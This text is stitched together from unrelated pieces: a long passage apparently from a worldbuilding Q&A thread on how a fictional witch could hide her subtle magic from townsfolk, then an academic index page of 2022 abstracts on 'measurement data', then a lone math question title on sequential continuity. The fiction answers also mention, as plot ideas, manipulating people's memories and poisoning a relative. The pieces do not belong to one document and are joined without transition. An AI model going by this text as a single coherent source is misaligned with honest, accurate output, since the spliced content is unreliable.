And you can use telekinesis for set up. As an example instead of making somebody slip, you can, while nobody is looking, make something slippery spread itself over the surface people will move over later. You can telekinetically open a lock just before somebody else tries to open the door. You can make a door somebody is trying to force open break easier than it really would have. You can even make an object several people are trying to move move easier because everyone will assume others are doing a more. And even if it is only one person is trying to move it when he is not really paying attention because of some emergency. Which covers most times you'd want to use telekinesis anyway.
You can also use telekinesis to avoid something. To make people not slip on a slippery surface. To make people not lose their balance on a narrow ledge. To make a door somedy is trying to break not break...
## Divination
The basic issue is really that nobody knows how this could work. Mostly this depends on how much advance warning you get. If only few seconds it is impossible to hide, if few hours or more nobody will never even notice you interfered to prevent something that never happened. For example, you could simply spend time with the boys so they never swim too far or go fishing with some other person who takes attention away from you when saving the boys. You can use your telekinesis to make minor repairs on things that would fail. To open a clogged safety valve of a fermetation vat, or to make a leak that lets out the pressure safely and forces replacing the vat.
You can mess with how people remember the events, right? Even without magic it is fairly easy to convince people that your idea was their idea. People take credit for ideas they like naturally without any urging. With magic to read people and make yourself less memorable there shouldn't be any real issue. Real world mystics and diviners can do some pretty impressive feats without a shred of magic simply by taking advantage of how people think. This is probably what Pratchett was referring with "headology", really.
## Evocation
You can make things colder or hotter or cause electric surges to disable equipment without too much problems.
Making things colder might for example slow down some process or make something more fragile. It would also be a good attack against people and animals when outside in a cold weather. It feels fairly natural and even a small drop will seriously sap your energy level as body will use as much energy as it can to prevent hypothermia. Hypothermia can also keep people alive longer in the right circumstances.
Increasing temperature can also be an effective attack in warm environments for similar reasons. Temperature can be useful in opening stuck locks or doors. And being able to increase heat can be a life saver for people vulnerable to hypothermia.
If you can cause large temperature changes in small areas you can unstuck almost anything and probably even disinfect wounds.
Electric surges have obvious value in an age filled with electric devices. And electronics is vulnerable to even quite small surges if accurately targeted.
## Anonymity
In large cities people can do quite a lot while remaining part of an anonymous background. As in example, your vulnerability is in people making connections between events that in separation are harmless. As long as you leave no paper trail when meddling this will be unlikely in a large city, if individual interventions are not noticeable enough to be mentioned to others with complete descriptions of that nice person who did not tell her name.
If somebody or something else is taking peoples attention people will not even remember you were present. If you can act from distance and mess with peoples minds this will be easy.
You can manipulate people to take the necessary actions and grab the attention. Make somebody else go fishing on that lake without even saying a word simply by tweaking the discussion they have with someone else. Make everyone forget you were there by having people skip mentioning you when first telling the story to their friends or the police.
## Make no patterns
Do not repeat the same action until there is a statistical anomaly. Do not spread your name around in context of interventions. Vary your appearance enough to avoid creating an urban legend of a woman with red shoes or green hair or whatever. In a large city where people do not really know you these will be a big help.
• Wow, choosing a winning answer will be hard. Lots of high-quality answers! – Serban Tanasa Mar 28 '15 at 1:45
The thing that trips you up here is what's called bias.
Specifically: Confirmation bias
Confirmation bias basically means that if someone says out loud "She's a witch!" then they will see a load of evidence to support this theory. The events where her powers were manifest will stand out.
It's actually very hard to avoid too - we have plenty of real world examples of witch trials where enough 'evidence' was secured to convict, despite such evidence only being allegation and confessions under torture.
So I think what she would need to do is be extremely careful to act at a distance, and try and decouple the chain of events. People will notice her involvement in fortunate outcomes. This may be ok, they'll assume she's lucky, but they will notice 'something special'.
We get winning streaks on a daily basis that look 'lucky' but are merely the result of humans being really bad at handling 'random'.
So what would be needed is action at a distance and plausible deniability. Avoiding being present at fortunate events. Sabotaging things in advanced - maybe the brewer is called out of town at short notice because a family member is unwell (poisoned), and that's nothing to do with her...
Healing done slowly and subtly - maybe outcomes are better overall, but anyone who makes a 'surprising' recovery will be treated with suspicion. This may, at extremes, mean letting someone die. But perhaps not - maybe it's possible to heal them slowly, and hiding the fact that naturally they would have died.
## People Will Talk
Even without any evidence at all, people will attribute positive (or negative) events to magic - even in a world where magic doesn't exist. A lot of positive events will undoubtedly cast suspicion. When something happens that is statistically unlikely, people are more likely to assume that the 'winner' was cheating. Hiding would mean not being associated with any suspicious events.
## Life in a Glass House
Now, as long as everything always goes great, a witch would probably be safe. People wouldn't want to push their luck, so as long as everything was always good. Of course... it's almost impossible for everything to always go right. Sometimes, even magic can't cure a disease, or stop an accident, and when someone gets hurt, there will be no more safety net. It's probably already gone - that brewer may have kept his life, but he lost his livelihood. If the townsfolk are already talking, it's only a matter of time before the torches and pitchforks come out.
## So what now?
To keep her abilities hidden, Rynn needs to become a con artist. She needs to practice the art of redirection, of covering her true intentions with something that looks plausible. The townsfolk have associated all those events with her because she was there. What Rynn needs to do is:
• Stay away. If at all possible, don't be present. A thousand magical events in a thousand different situations (like a log magically floating out to the two drowning boys) are harder to put together than a thousand magical events with a single point of similarity. So, Rynn needs to stay out of sight as much as possible. If she were "out of town" while something happened, all the better.
• Redirect. A lot of trouble can be avoided by simply not being there; however, instead of it being Rynn herself making sure no one is there, she needs to get someone else to do it. Perhaps the brewer gets message from the bank demanding a meeting, or his wife gets a bad cold so he's late to work; either way, there is no suspicion thrown on Rynn.
• Don't get greedy. It's easy to want the best in every situation, but "the best" also stands out like a sore thumb. Instead of ducking when a rock it thrown, Rynn should let it glance off her shoulder. Instead of the thieves returning her purse, they just 'accidentally' lose it, and someone else returns it to her (at which point she cries about the missing money, even if there wasn't any). Bad things keep happening, just not as bad as they could have been.
• Have a reason. Sure, Rynn's cookies cure kids; why wouldn't they? She puts some healing herbs from Farmer Brown's north pasture in them. Everyone knows those herbs cure anything. Instead of magically getting better, the kids get better because of Science!... even if it isn't science.
• Be friendly. It's one thing to accuse a stranger or an acquaintance, but it's another to accuse a close friend. The more friends Rynn has, the more potential allies she gains; down at the pub, when two men start talking about "that strange woman," her next door neighbor can casually chime in, diffusing the situation.
• Ask favors. This actually has two benefits; first, a witch can do everything for herself, so someone asking for help probably isn't a witch. And second, asking someone for a favor actually causes them to trust you more.
## Specifics
All of this is, in the end, Headology. The more Headology, the better, in fact. If Rynn keeps tabs on the townspeople, and diffuses tension before it can build, she will stay safe.
Telekinesis can be helpful for tiny nudges, but she shouldn't do anything obvious with it: untie a shoelace, but don't lift a boulder in the air. In fact, it would be better to use telekinesis to stop things from happening; no one notices when a rock doesn't roll down a hill.
Divination is the key to staying out of trouble, too; the longer she can see into the future, the better off she'll be. She could even test several methods of helping people before she actually tries them.
Evocation, on the other hand, would be dangerous, because it's highly visible, and almost impossible to pass off as a natural event. No newt-transfigurations or lightning bolts here! That's a sure-fire way to get your trial after your hanging.
• Very thorough answer! – Serban Tanasa Mar 28 '15 at 1:09
• "no one notices when a rock doesn't roll down a hill". Yes stopping things happening which no one was expecting anyway is almost perfectly hidden. – trichoplax Mar 28 '15 at 15:06
• Telekinesis would be most effective at the start of an action--before a ball leaves someone's hands, for example. Then the trajectory need not change. That requires constant divination. An alternative is to make sure people notice and just correctly avoid any dangers. Kid drowning? Make sure he notices the strong undercurrent and doesn't go swimming. Rock being thrown? Make sure the thrower's shoe and breath makes enough of a sound to draw attention, and that the targeted person correctly predicts how to dodge it. And so on. – Kimball Robinson Dec 1 '15 at 20:07
• Humans tend not to connect events separated by time, or when there is an easier explanation. She simply needs to avoid being around when the miracles occur, and there needs to be another explanation. Perhaps several other explanations. – Kimball Robinson Dec 1 '15 at 20:08
Rather than answer all the questions posed I'm going to focus on one aspect of this question:
How should a mage act to make him less likely to be detected?
They will have to let some bad things happen. Both to themselves, and to others. There are some actions they could take but even when people aren't magic, it only takes one or two coincidences for people to connect dots that may or may not be there, and call it witchcraft. Consider the Salem Witch Trials. No magic, and yet once someone claimed that their neighbor was a witch then others were willing to come forth to testify against them, having seen anomalies.
Humans are exceptional at noticing oddities, coincidences, correlations, etc.
Further, I don't think this is something they could do as a child and get away with it - in their youthful enthusiasm they would undoubtedly be discovered. Either the magic has to come very gradually once they gain enough understanding of the world to protect themselves, or they have to be trained by someone who knows their magic, or it has to be subconscious such that they aren't even aware that they are doing it, but still limited to avoid detection.
Lastly, you couldn't call "entire town trance" subtle, and outsiders would quickly notice something wrong, so I don't think this would apply to your question. But it's worth some consideration if your location is particularly secluded.
• "She turned me into a newt!!!" – user4239 Mar 26 '15 at 13:48
• @DVK "It's a fair cop." – Adam Davis Mar 26 '15 at 13:50
This is long, because I have had a great deal of fun exploring magic from an information theory perspective. There's a separator half way through for those who just want to read how Rynn should behave.
I would approach this from a key observation: others will observe the effects of Rynn's magic. If they don't, it makes for very poor magic. Something should happen. While it may seem like the secret to subtle magic is to make as "small" of a change as possible, a more precise wording is helpful: the secret to subtle magic is to do things in a way which is easily explained by The Unknown or to encourage others to not search for an explanation in the first place.
In science, The Unknown is modeled as random variables. However, The Unknown takes on many forms in other approaches to making sense of the world. The Norse might call it Loki's mischief. I've heard it called the devil's handiwork before. Whatever you call it, it represents that of the world which you did not measure, thus cannot predict its effects.
This approach is particularly convenient for modeling such subtle magic because it lends itself to an easy study using information theory. Assume we all have some information about the world. As we interact with it, we learn more. We also forget things which are of lower value (consider: the third letter of this paragraph is an 'i,' but you didn't think it was important enough to remember that, did you?)
To elicit a subtle magic effect is akin to being able to see the world in a different way. Consider the subtle magic of a teenager fixing their grandparent's computer. The way the grandparents view the world is valuable in many ways, but in the particular case of computers, their worldview is highly ineffective at solving problems. The teenager, having grown up with computers, can easily see the root causes of computer related problems and find solutions. From the grandparents' point of view, what the teenager does is indistinguishable from a subtle magic. They simply cannot see enough information to explain why the teenager's approach yields success when theirs fails. All they can do is keep his or her number on speed dial and thank the stars that they don't have to solve these problems on their own.
Such a world view can be viewed as a body of information itself. The worldview is made up of many assumptions and patterns that have been useful in the past for understanding the world with as little effort as possible. Being information, it can be shared. This is where our teenager's plight differs from Rynn's. While the teenager would certainly love it if their grandparents figured out how to work a computer, Rynn has a vested interest in not letting them do so. If everyone could see the world the way she does, then they could predict her abilities in advance and effectively nullify them. She needs to keep this worldview secret. This leads to what I would call the first rule of keeping magic:
Magic must not "leak" information about how it approaches the world, or it becomes commonplace, just as the magic of flight is now a daily commute for many.
So how do we avoid leaks. There are two fundamental techniques I can identify:
• Don't emit any information.
• "Whiten" the leaked information to make it appear more like The Unknown before emitting it.
• Gather information that others do not know, and obscure the leaked information with it.
The first solution is easy. If you don't emit any information about your worldview, you are safe. However, this is very difficult in the face of science. Science is very good at collecting multiple datapoints and mining them for data. The one escape: do magic only once. In many magic systems we see the concept of someone getting to do a "miracle," but often they can only do one. The idea is that each person has something that makes them "them." Nobody else has it. If you are willing to give it up, you can do tremendous magic. However, afterwards, everyone knows that little bit that makes you "you." With that information, they can identify how you did the magic, and it ceases to become magic. However, in the case of miracles, the effect is already done. It occurred too fast to prevent the first time; all the world can do is prevent it from happening again.
The next two solutions both involve "whitening" the information to make it harder to discern from The Unknown. This process is easily seen in modern computer cryptography. Two individuals with a shared secret can communicate using an encryption which others cannot penetrate (such as AES). One way this can be applied to magic is if a founder of a magic school can split the magic into two parts which functions similar to public key cryptography. The founder breaks the magic into a public and private part. The public part is the one which does all of the work of magic, but it can only do it with the help of the private part. The private part contains the secret keys to the art shared only between those in the school of magic and the source of the magic itself (perhaps the universe). When "casting a spell," the inner part allows for an interaction with the source of magic which appears to be noise unless you have the secret key. The source then provides you the power needed to complete the spell using the public part of the magic.
This pattern shows up in secret societies. When a magical group has secret rituals, they form the backbone of that inner "private" key. If you could observe those rituals, you could dismantle their power. They keep them secret. However, you see the outer "public" key, which is the powerful magics they wield (such as the ability to cause rain to fall).
Of course this has two fundamental ways to fall apart. The first is obvious: if the secret rituals are exposed, so is the root of their power (akin to Sampson of the Bible having his hair cut). The second is more subtle: your power is only protected by how effectively your secret rituals actually guard your abilities. Consider the ENIGMA, which had the magical ability to protect German U-Boat movements until mathematicians in England figured out exploits to uncover the secret keys. Secrets get broken all the time.
The final solution in my list is to acquire information which is not known by anyone else, and use it to "whiten" the magical information. This has a dark side and a light side. The dark side is visible in many magic systems: the ability to take information by force. Sacrifices and blood thaumaturgy are examples of using something which has never been exposed to anyone else and using that to whiten the magic.
Before going onto the light side, I'd point out the middle ground you will find between them: chance. If your magic works if a coin flip is "heads" and fails if the coin flip is "tails," then it leaks 50% as much information with each usage.
The light side is to use only information which is given freely. Secrets, promises, locks of hair: these are often given as "payment" for magic. These contain enough information to obscure the magic from the world, making it appear Unknown.
The lightest of the light side is to use only information which is forgotten or left behind. Most people forget how many steps they took from the cab to the front door, or whether they turned the doorknob clockwise or counterclockwise to enter. This is enough to "whiten" very strong magic, so long as nobody ever catches on to how you're doing it.
So let's get to Rynn. How does Rynn remain undetected. Of all of the methods of obscuring magic, the only one which is reliably undetectable is to collect that which is forgotten. However, we run into a bit of an issue: nothing is ever truly forgotten. Someone may forget their hat, only to remember it and come back later. If she were to rely on such forgotten things, she would eventually be trapped.
There is one pattern that is demonstrably undetectable. Many interactions are not fully observable. Push on someone and it's hard to tell if they're just really light for their size, or if they helped you by moving with you instead of resisting. Shake someone's hand, and it is hard to tell if you are enthusiastic to meet them, or if they are enthusiastic to meet you; both cause the handshake to pump up and down the same. In these situations, each party only observes at most half of the information in total. The other half is free to be used for whitening.
Now eventually someone will catch on. After all, you only get lucky so many times. Someone will eventually figure out what Rynn is doing if she's not careful. She needs a second layer of defense - one which your description captured perfectly. She needs people to want to believe she's just lucky. Accordingly, she needs to seek out win-win situations, where she benefits and the other party benefits. Hence the curious tendency for people to just get better around her. This would result in a tendency for people to begin to migrate towards her instinctively.
Eventually people do realize there's something special about her, but if they are comfortable enough with that level of specialness, they wont pry. (Interestingly enough, this is a strong in-character corollary to Sanderson's First Law of Magic, "The ability for an author to use magic to resolve conflict is directly proportional to how much the reader understands it.")
Now for actions. These are the interesting part. Consider that an ill-worded answer to a sharply phrased question could reveal a little of her magic. Too many such answers could box her in, forcing her to reveal more than she wants to. She would have a strong tendency to avoid giving answers to sharp questions - ideally by misdirecting away from them, but she would resort to vague answers if needed. Her actions would be similarly vague. If people are naturally attracted to her, she would need to be able to move agilely to avoid being smothered by them (physically and socially).
The rest of society can help. Attitudes such as "do what you will, may it harm none" would allow much more room for Rynn to do extraordinary things without bothering people. Scientific thought would be the most difficult attitude for her to cope with. Scientists would constantly be trying to fix the variables she needs to whiten her magic. One strong sign of this would be people asking for repeat performances of previous magic (to which she would never do exactly the same thing twice. Each magic would be independent to the circumstances). A fear of The Unknown could result in a violent confrontation with Rynn, for her power depends on the ability to blend in with The Unknown. If it, itself, is hated, then blending in is much less useful.
Your background evokes a society full of superstitious folk, who would suspect magic even when it isn't there. So I think no matter what Rynn did, people in that town would believe she was a witch, even if they had no evidence, and in fact, probably even if she wasn't. They would want to protect her, to turn a blind eye, because she is kind and helpful, so she could actually get away with an awful lot - so long as it didn't harm people, or make it seem like she could read their thoughts or control their actions.
Now, I was thinking into this kind of society, bound to suspect magic even from non-magical healings, you could introduce a character who explains everything with science. Someone who shows how the tricks are done (in fact, does those tricks themselves), and defrauds imposters. Someone with a Sherlock Holmes ability to read people, a medical background, an interest in mechanics, and a good head on their shoulders in times of great pressure. Working together like Penn and Teller, Everyone would be looking at the showy magician while Rynn was quietly doing the magic. Occasionally the magician "explains how it was done".
In this situation - you could get away with EVERYTHING.
• The more they believed in her, the greater the temptation to think that bad things that she could not avert were intentional acts on her part. Thus the witch label comes again. – Oldcat Mar 26 '15 at 17:53
• That's why I think it is important for her to acquire a foil. Suspicion will happen no matter what otherwise. If not a foil, a powerful protector. – Kristy Mar 28 '15 at 4:01
If you wanted a magic that was indistinguishable from luck but consistently in your favour, I think the magical ability you would need would be to see alternate outcomes of an event and to pick which outcome occurs. If you were to subscribe to the many-worlds theory this would be a matter of picking out which world you are in following any specific event.
This is quite an interesting idea as a form of magic, guiding the world towards the outcomes you desire by nudging the causal chain of events that would otherwise fall out randomly. Perhaps there is a certain maximum probability beyond which someone with this ability would not be able to reach.
It also opens the door for a certain irony in your storytelling- the ability to forsee the consequences of events in the short term might well lead to unforeseen consequences in the longer term and there would probably be greater risks with affecting causality more strongly, all kinds of butterfly effect style chaotic outcomes emerge on the cards.
The same way they audit casinos to ensure that the games are as-specified (I wouldn't call them fair). Adding up day to day events is fraught with bias. You need to pair events with those occuring to other people, and choose things that you can obtain clear results for, rather than fuzzy subjective judgements.
Given that, statistics are well understood and used in science for that purpose. Seven sigmas is the standard for discovering the Higgs Boson, as opposed to coincedences and random jitter.
But, by whatever means would be possible for normal, phenomena, her talent would work to prevent being discovered. If you were going to be suspicious, she would just happen to avoid you or you would start to miss seeing the events.
I love the idea that magic itself has a mysterious cognizance. That the protection afforded is not specifically controlled by the conjurer/subject, but by some other unknown force. Piers Anthony used that concept once: a character had the magical quality of silent protection; to protect itself, the ability prevented detection by others, through no action by the character. The character didn't even realize the quality existed for most of the novel.
So, using the OP's example, Rynn would act to tie her shoelaces right then. Not because she knew the rock was coming, but because she just happened to notice and the timing was perfect. So I suppose that's a form of Evocation, but with a twist?
One interesting way to think of the magic would be the ability to sense and manipulate luck itself, with the caveat that she can't create luck, just transfer it. That would both explain the need to keep it subtle and why she can't just eliminate all traces.
Perhaps without Rynn's intervention the fermentation vat accident would have severely burned the brewer, but done little damage to his property. She traded off the good luck of avoiding injury with the bad luck of extensive property damage. She doesn't stop the boys from going swimming in the first place, because that would require an unacceptable expenditure of bad luck somewhere else. The orphanage donation may have been made possible by the naturally-accumulated bad luck of the orphans. The sick children accidentally got caught in some crossfire of a luck transfer, so Rynn corrected it when she was able. The cookies had nothing to do with the magic, but were made by way of apology.
The climax of the story could involve some spectacular feat of magic that everyone agrees is necessary, but comes at great cost.
• Very interesting! – Serban Tanasa Mar 28 '15 at 1:07
If magic/witchcraft was real, then Rynn's brand of magic would be much closer to the truth than Harry Potter, or any witchcraft in popular culture.
Is she really a witch, or just some crafty old lady? If someone snuck up behind her and threw a rock, did she know they were there the whole time and anticipate the rock being thrown, or did she really have magical powers?
Maybe she really did cast a spell on the cookies to magically make the children feel better, or perhaps she used herbs or some other natural ingredients which made their little tummies feel better instead.
The bottom line is that there should be some kind of scientific explanation for her actions. This explanation might not be immediately obvious at first, but might make sense with an explanation at a later date.
In the Middle Ages educated intelligent people needed to stay away from the limelight or risk being executed or jailed. Religious dogma ruled far and wide, and intelligent people were persecuted by the church for heresy and witchcraft for simply knowing too much, or going against the norms of that culture.
Throughout Europe during those times, much of the ancient knowledge was lost. It would take centuries to undo the damage done during this period. Countless books were burned, and scientific research came close to a standstill. Change was not embraced, and not much changed technologically during that period.
Rynn could be a modern day throwback to the idea that there were still intelligent people in the Middle Ages, but they more or less kept to themselves for fear of persecution. She could live in an area in the Bible Belt that is very resistant to change, and she would rather keep to herself then deal with the locals. To keep people away, she could have built a reputation for being a witch. This could be a combination of strange happenings which are true and others which are made up stories to keep the people confused. She will always try to keep at least a few steps ahead of everyone else to keep this going as much as possible.
Or.. perhaps she really is a witch after all. The choice is yours.
belated answer, consider adding a scapegoat. Something else that is 'lucky' and not Rynn.
Have someone find something one day that is unique and convince everyone that it is lucky. Get them to believe that as long as they take care of the object good luck will happen, that they need to value it.
When something bad happens to the object temporarily make lots of minor, nothing too harmful, bad luck happen around town. The sort of annoyances that stick out in our head but don't really do any long term harm. Then help everyone to do something to make 'right' whatever was done wrong so they can get their good luck back.
This way people will associate the good luck with the object, not Rynn. Their own confirmation bias will ensure everything gets credit to the object. Now anyone who does have a tendency to think twice about their good fortune knows who's to blame and doesn't look for a second candidate.
After awhile, once everyone has firmly decided the object is special, Rynn can claim to be helping to take care of it, and in so doing explain any good luck that happens near her is just the object acting through her to do bring good fortune.
This is a general overview, there are lots of similar approaches to the same idea; the key thing is to give an alternate suggestion for the course of their good luck. She still needs to work indirectly, but she can get some additional leeway. The biggest way to make this work is to every now and then have something take away the luck if something happens to the object; but in a way where the townsfolk can easily fix the problem, so that there is a quick cause-effect relationship to confirm their belief the object causes the luck.
Dilution is the solution to pollution.
Rynn does the magic stuff. She does lots and lots of other stuff too. She is active in city politics and in her church. She is a relentless volunteer and organizer. She attends rallies and protests. She coordinates public art. She advocates for her community at the state and sometimes even national level.
She is not a loudmouth but she is everywhere - a fixture of the city. So when the kids feel better after eating her oatmeal cookies that is diluted out by the kid who got bit by a dog after eating her oatmeal cookies, or the kid who got picked up by the cops for shoplifting after eating her oatmeal cookies. It is no surprise that she helped those kids at the lake; it is not uncommon to see her there with her friends picking up the park or even going for a swim.
Her magical deeds are diluted out in a sea of ordinary and even extraordinary deeds. It is possible that all her deeds are leavened with subtle magic. People chalk it up to her green eyes.
I would offer a two-pronged answer:
1: How many uncanny apparent coincidences could a character get away with?
2: Even or especially if she has unearthly charisma, she's in a danger zone; people at extremes of privilege can experience Wagon, Blackbird, Saab effects.
The beginning of blackbird effects, unlike the story is told, begin well, well, well before people say, "This has to be supernatural!"
There are a lot of very good and complete answers and I don't want to write a wall of text just to repeat what others have already said.
Some have mentioned the need to divert (on a long enough time frame) attention away from her in regards to all the lucky events happening around her and the village. Obviously she doesn't want to stop being a witch (stop using magic) just to protect herself from bias and lack of understanding. But if she were to realize the danger of it, I think it would be fairly easy for her to cast the reason for the town's luck onto pretty much anything she wants. (An old tree in the village square was saved after some controversy and following the decision to keep it, an abnormal amount of luck occurred all over the place, etc..)
Symbols hold great strength. And while the children might still whisper in corners that she does magic and all that, adults will easily dismiss them because the village is lucky because of [Insert event or Symbol, Statue etc..], not the sweet girl/woman who is so shy and caring. (How dare you accuse her of such a thing - nothing wrong with a magic fountain though.)
|
# measurement dataRecently Published Documents
## TOTAL DOCUMENTS
5174
(FIVE YEARS 2726)
## H-INDEX
55
(FIVE YEARS 20)
2022 ◽
Vol 167 ◽
pp. 108542
Author(s):
Tianqi Gu ◽
Hongxin Lin ◽
Dawei Tang ◽
Shuwen Lin ◽
Tianzhi Luo
Keyword(s):
2022 ◽
Vol 204 ◽
pp. 107691
Author(s):
Xueping Li ◽
Shengli Wang ◽
Zhigang Lu
Keyword(s):
2022 ◽
Author(s):
Ye Xiaoming ◽
Ding Shijun ◽
Liu Haibo
Keyword(s):
Abstract In the traditional measurement theory, precision is defined as the dispersion of measured value, and is used as the basis of weights calculation in the adjustment of measurement data with different qualities, which leads to the trouble that trueness is completely ignored in the weight allocation. In this paper, following the pure concepts of probability theory, the measured value (observed value) is regarded as a constant, the error as a random variable, and the variance is the dispersion of all possible values of an unknown error. Thus, a rigorous formula for weights calculation and variance propagation is derived, which solves the theoretical trouble of determining the weight values in the adjustment of multi-channel observation data with different qualities. The results show that the optimal weights are not only determined by the covariance array of observation errors, but also related to the model of adjustment.
Author(s):
Timon Hummel ◽
Claude Coatantiec ◽
Xavier Gnata ◽
Tobias Lamour ◽
Rémi Rivière ◽
...
Keyword(s):
AbstractThe measurement accuracy of recent and future space-based imaging spectrometers with a high spectral and spatial resolution suffer from the inhomogeneity of the radiances of the observed Earth scene. The Instrument Spectral Response Function (ISRF) is distorted due to the inhomogeneous illumination from scene heterogeneity. This gives rise to a pseudo-random error on the measured spectra. In order to assess the spectral stability of the spectrograph, stringent requirements are typically defined on the ISRF such as shape knowledge and the stability of the centroid position of the spectral sample. The high level of spectral accuracy is particularly crucial for missions quantifying small variations in the total column of well-mixed trace gases like $$\hbox {CO}_{2}$$ CO 2 . In the framework of the $$\hbox {CO}_{2}$$ CO 2 Monitoring Mission (CO2M) industrial feasibility study (Phase A/B1 study), we investigated a new slit design called 2D-Slit Homogenizer (2DSH). This new concept aims to reduce the Earth scene contrast entering the instrument. The 2DSH is based on optical fibre waveguides assembled in a bundle, which scramble the light in across-track (ACT) and along-track (ALT) direction. A single fibre core dimension in ALT defines the spectral extent of the slit and the dimension in ACT represents the spatial sample of the instrument. The full swath is given by the total size of the adjoined fibres in ACT direction. In this work, we provide experimental measurement data on the stability of representative rectangular core shaped fibre as well as a preliminary pre-development of a 2DSH fibre bundle. In our study, the slit concept has demonstrated significant performance gains in the stability of the ISRF for several extreme high-contrast Earth scenes, achieving a shape stability of $$<0.5{\%}$$ < 0.5 % and a centroid stability of $$<0.25 \ \text {pm}$$ < 0.25 pm (NIR). Given this unprecedented ISRF stabilization, we conclude that the 2DSH concept efficiently desensitizes the instrument for radiometric and spectral errors with respect to the heterogeneity of the Earth scene radiance.
2022 ◽
Vol 12 (1) ◽
pp. 102
Author(s):
Reizo Kato ◽
Masashi Uebe ◽
Shigeki Fujiyama ◽
Hengbo Cui
A molecular Mott insulator β′-EtMe3Sb[Pd(dmit)2]2 is a quantum spin liquid candidate. In 2010, it was reported that thermal conductivity of β′-EtMe3Sb[Pd(dmit)2]2 is characterized by its large value and gapless behavior (a finite temperature-linear term). In 2019, however, two other research groups reported opposite data (much smaller value and a vanishingly small temperature-linear term) and the discrepancy in the thermal conductivity measurement data emerges as a serious problem concerning the ground state of the quantum spin liquid. Recently, the cooling rate was proposed to be an origin of the discrepancy. We examined effects of the cooling rate on electrical resistivity, low-temperature crystal structure, and 13C-NMR measurements and could not find any significant cooling rate dependence.
2022 ◽
Vol 13 (1) ◽
pp. 120
Author(s):
Haoran Zhai ◽
Jiaqi Yao ◽
Guanghui Wang ◽
Xinming Tang
Based on measurement data from air quality monitoring stations, the spatio-temporal characteristics of the concentrations of particles with aerodynamic equivalent diameters smaller than 2.5 and 10 μm (PM2.5 and PM10, respectively) in the Beijing–Tianjin–Hebei (BTH) region from 2015 to 2018 were analysed at yearly, seasonal, monthly, daily and hourly scales. The results indicated that (1) from 2015 to 2018, the annual average values of PM2.5 and PM10 concentrations and the PM2.5/PM10 ratio in the study area decreased each year; (2) the particulate matter (PM) concentration in winter was significantly higher than that in summer, and the PM2.5/PM10 ratio was highest in winter and lowest in spring; (3) the PM2.5 and PM10 concentrations exhibited a pattern of double peaks and valleys throughout the day, reaching peak values at night and in the morning and valleys in the morning and afternoon; and (4) with the use of an improved sine function to simulate the change trend of the monthly mean PM concentration, the fitting R2 values for PM2.5 and PM10 in the whole study area were 0.74 and 0.58, respectively. Moreover, the high-value duration was shorter, the low-value duration was longer, and the concentration decrease rate was slower than the increase rate.
2022 ◽
Vol 12 (2) ◽
pp. 729
Author(s):
Keyword(s):
Due to the recent increase in the intensity of rainstorms, the Japanese government has announced a new policy of flexible flood mitigation measures that presupposes the release of water volumes exceeding the river channel capacity onto floodplains. However, due to the limited amount of quantitative measurement data on excess runoff, it will take time to formulate planning standards for remodeling and newly constructing flood control facilities reasonable enough under current budgetary constraints. In this study, the capacity shortage of a flood detention pond was evaluated against the excess runoff from a severe 2019 flood event by combining the fragmentary measurement data with a numerical flow simulation. Although the numerical model was a rather simple one commonly used for rough estimation of inundation areas in Japan, the results were overall consistent with the observations. Next, in accordance with the new policy, an inexpensive remodeling of the detention basin, which was designed according to conventional standards, was simulated; the upstream side of the surrounding embankment was removed so that excess water flowed up onto the floodplain gradually. Numerical experiments using the simple model indicated that the proposed remodeling increased the effectiveness of flood control remarkably, even for floods greater than the 2019 flood, without much inundation damage to upstream villages.
2022 ◽
Vol 12 (2) ◽
pp. 747
Author(s):
Yaxiong Ren ◽
Tobias Melz
Keyword(s):
In recent years, the rapid growth of computing technology has enabled identifying mathematical models for vibration systems using measurement data instead of domain knowledge. Within this category, the method Sparse Identification of Nonlinear Dynamical Systems (SINDy) shows potential for interpretable identification. Therefore, in this work, a procedure of system identification based on the SINDy framework is developed and validated on a single-mass oscillator. To estimate the parameters in the SINDy model, two sparse regression methods are discussed. Compared with the Least Squares method with Sequential Threshold (LSST), which is the original estimation method from SINDy, the Least Squares method Post-LASSO (LSPL) shows better performance in numerical Monte Carlo Simulations (MCSs) of a single-mass oscillator in terms of sparseness, convergence, identified eigenfrequency, and coefficient of determination. Furthermore, the developed method SINDy-LSPL was successfully implemented with real measurement data of a single-mass oscillator with known theoretical parameters. The identified parameters using a sweep signal as excitation are more consistent and accurate than those identified using impulse excitation. In both cases, there exists a dependency of the identified parameter on the excitation amplitude that should be investigated in further research.
2022 ◽
Author(s):
Alex Dornburg ◽
Katerina Zapfe ◽
Rachel Williams ◽
Michael Alfaro ◽
Richard Morris ◽
...
Across the Tree of Life, most studies of phenotypic disparity and diversification have been restricted to adult organisms. However, many lineages have distinct ontogenetic phases that do not reflect the same traits as their adult forms. Non-adult disparity patterns are particularly important to consider for coastal ray-finned fishes, which often have juvenile phases with distinct phenotypes. These juvenile forms are often associated with sheltered nursery environments, with phenotypic shifts between adults and juvenile stages that are readily apparent in locomotor morphology. However, whether this ontogenetic variation in locomotor morphology reflects a decoupling of diversification dynamics between life stages remains unknown. Here we investigate the evolutionary dynamics of locomotor morphology between adult and juvenile triggerfishes. Integrating a time-calibrated phylogenetic framework with geometric morphometric approaches and measurement data of fin aspect ratio and incidence, we reveal a mismatch between morphospace occupancy, the evolution of morphological disparity, and the tempo of trait evolution between life stages. Collectively, our results illuminate how the heterogeneity of morpho-functional adaptations can decouple the mode and tempo of morphological diversification between ontogenetic stages.
2022 ◽
Author(s):
Lukas Siebler ◽
Torben Rathje ◽
Maurizio Calandri ◽
Konstantinos Stergiaropoulos ◽
Bernhard Richter ◽
...
Keyword(s):
Operators of event locations are particularly affected by a pandemic. Resulting restrictions may cause uneconomical business. With previous models, only an incomplete quantitative risk assessments is possible, whereby no suitable restrictions can be derived. Hence, a mathematical and statistical model has been developed in order to link measurement data of substance dispersion in rooms with epidemiological data like incidences, reproduction numbers, vaccination rates and test qualities. This allows a first time overall assessment of airborne infection risks in large event locations. In these venues displacement ventilation concepts are often implemented. In this case simplified theoretical assumptions fail for the prediction of relevant airflows for infection processes. Thus, with locally resolving trace gas measurements and specific data of infection processes, individual risks can be computed more detailed. Via inclusion of many measurement positions, an assessment of entire event locations is possible. Embedding the overall model in a flexible application, daily updated epidemiological data allow latest calculations of expected new infections and individual risks of single visitors for a certain event. With this model, an instrument has been created that can help policymakers and operators to take appropriate measures and to check restrictions for their effect.
|
Prove that if $\lim_{n \to \infty} f(x_n) = f(\lim_{n \to \infty} x_n)$ for all sequences that converge to $x$, then $f$ is continuous [duplicate]
